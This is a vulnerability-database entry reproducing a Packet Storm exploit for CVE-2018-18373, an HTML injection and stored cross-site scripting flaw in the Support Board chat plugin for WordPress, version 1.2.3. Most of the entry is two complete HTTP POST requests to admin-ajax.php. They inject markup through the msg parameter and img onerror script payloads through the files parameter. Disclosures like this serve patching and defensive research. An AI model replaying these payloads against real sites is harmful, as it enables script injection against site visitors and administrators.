Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormIsmail TasdelenPACKETSTORM:149806
HistoryOct 16, 2018 - 12:00 a.m.

WordPress Support Board 1.2.3 Cross Site Scripting

2018-10-1600:00:00
Ismail Tasdelen
packetstormsecurity.com
105

EPSS

0.001

Percentile

20.2%

JSON
`# Exploit Title: Support Board - PHP & Wordpress Plugin v1.2.3 - HTML Injection and Stored XSS  
# Date: 2018-10-16  
# Exploit Author: Ismail Tasdelen  
# Vendor Homepage: https://schiocco.com/  
# Software Link : https://board.support/  
# Software : Support Board - Chat And Help Desk  
# Version : v1.2.3  
# Vulernability Type : Code Injection  
# Vulenrability : HTML Injection and Stored XSS  
# CVE : CVE-2018-18373  
  
# In the Schiocco "Support Board - Chat And Help Desk" plugin 1.2.3 for WordPress, a Stored XSS vulnerability has been discovered in file upload areas in the Chat and Help Desk sections via the msg parameter in a /wp-admin/admin-ajax.php sb_ajax_add_message action.  
  
  
# HTTP POST Request : [HTML Injection]  
  
POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: TARGET  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://TARGET/desk-demo/  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 288  
Cookie: _ga=GA1.2.1452102121.1539634100; _gid=GA1.2.1034601494.1539634100; PHPSESSID=pljbkl7n96fpl5uicnbec21f77  
Connection: close  
  
action=sb_ajax_add_message&msg=%26%238220%3B%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E&files=&time=10%2F15%2F2018%2C+4%3A19%3A45+PM&user_id=70765091&user_img=https%3A%2F%2Fboard.support%2Fwp-content%2Fuploads%2F2017%2F07%2Fuser.jpg&user_name=James+Wilson&user_type=user&environment=wp&sb_lang=  
  
# In the v1.2.3 version of the Support Board - Chat And Help Desk PHP & Wordpress Plugin, the Stored XSS vulnerability has been discovered in  
the HTML Injection vulnerability and file upload areas in the Chat and Help Desk sections of Schiocco.  
  
# HTTP POST Request : [Stored XSS]  
  
POST /wp-admin/admin-ajax.php HTTP/1.1  
Host: TARGET  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0  
Accept: */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://TARGET/chat/  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
X-Requested-With: XMLHttpRequest  
Content-Length: 450  
Cookie: _ga=GA1.2.1452102121.1539634100; _gid=GA1.2.1034601494.1539634100; PHPSESSID=pljbkl7n96fpl5uicnbec21f77  
Connection: close  
  
action=sb_ajax_add_message&msg=&files=https%3A%2F%2FTARGET%2Fwp-content%2Fuploads%2Fsupportboard%2F70765091%2F%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E.jpg%7C%22%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E.jpg&time=10%2F15%2F2018%2C+4%3A23%3A42+PM&user_id=70765091&user_img=https%3A%2F%2Fboard.support%2Fwp-content%2Fuploads%2F2017%2F07%2Fuser.jpg&user_name=James+Wilson&user_type=user&environment=wp&sb_lang=  
  
`

Related

cve 1
cvelist 1
nvd 1
wpvulndb 1
prion 1
cve
cve
CVE-2018-18373
2018-10-17 14:29:01
cvelist
cvelist
CVE-2018-18373
2018-10-17 14:00:00
nvd
nvd
CVE-2018-18373
2018-10-17 14:29:01
wpvulndb
wpvulndb
Support Board - Chat And Help Desk | Support & Chat <= 1.2.3 - XSS
2018-10-16 00:00:00
prion
prion
Cross site scripting
2018-10-17 14:29:00

EPSS

0.001

Percentile

20.2%

JSON
Related for PACKETSTORM:149806
cve1cvelist1nvd1wpvulndb1prion1